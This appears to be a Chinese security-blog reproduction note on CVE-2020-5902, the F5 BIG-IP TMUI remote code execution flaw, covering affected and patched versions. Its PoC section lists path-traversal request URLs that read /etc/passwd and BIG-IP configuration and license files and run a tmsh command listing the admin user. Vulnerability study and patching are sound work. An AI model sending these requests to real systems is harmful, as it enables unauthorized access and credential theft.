CVE-2020-5902(BIG-IP RCE) - 图1
    CVE-2020-5902(BIG-IP RCE)



    一、漏洞描述

    F5 BIG-IP 是美国F5公司一款集成流量管理、DNS、出入站规则、web应用防火墙、web网关、负载均衡等功能的应用交付平台。
    F5 BIG-IP 产品的流量管理用户页面 (TMUI)/配置程序的特定页面中存在一处远程代码执行漏洞。
    未授权的远程攻击者通过向该页面发送特制的请求包,可以造成任意Java 代码执行。进而控制 F5 BIG-IP 的全部功能,包括但不限于: 执行任意系统命令、开启/禁用服务、创建/删除服务器端文件等。

    二、影响版本

    BIG-IP 15.x: 15.1.0/15.0.0
    BIG-IP 14.x: 14.1.0 ~ 14.1.2
    BIG-IP 13.x: 13.1.0 ~ 13.1.3
    BIG-IP 12.x: 12.1.0 ~ 12.1.5
    BIG-IP 11.x: 11.6.1 ~ 11.6.5

    三、漏洞验证
    POC:

    1. https:///tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwdhttps:///tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hostshttps:///tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.licensehttps:///tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.confhttps:///tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin

    截图:
    CVE-2020-5902(BIG-IP RCE) - 图2
    简单编写py脚本
    CVE-2020-5902(BIG-IP RCE) - 图3
    验证:
    CVE-2020-5902(BIG-IP RCE) - 图4

    四、漏洞修复
    升级到以下版本:
    BIG-IP 15.x: 15.1.0.4
    BIG-IP 14.x: 14.1.2.6
    BIG-IP 13.x: 13.1.3.4
    BIG-IP 12.x: 12.1.5.2
    BIG-IP 11.x: 11.6.5.2

    参考:
    https://blog.csdn.net/weixin_45728976/article/details/107120394?%3E
    https://github.com/nsflabs/CVE-2020-5902
    https://github.com/jas502n/CVE-2020-5902

    免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
    订阅查看更多复现文章、学习笔记
    thelostworld
    安全路上,与你并肩前行!!!!
    CVE-2020-5902(BIG-IP RCE) - 图5
    个人知乎:https://www.zhihu.com/people/fu-wei-43-69/columns
    个人简书:https://www.jianshu.com/u/bf0e38a8d400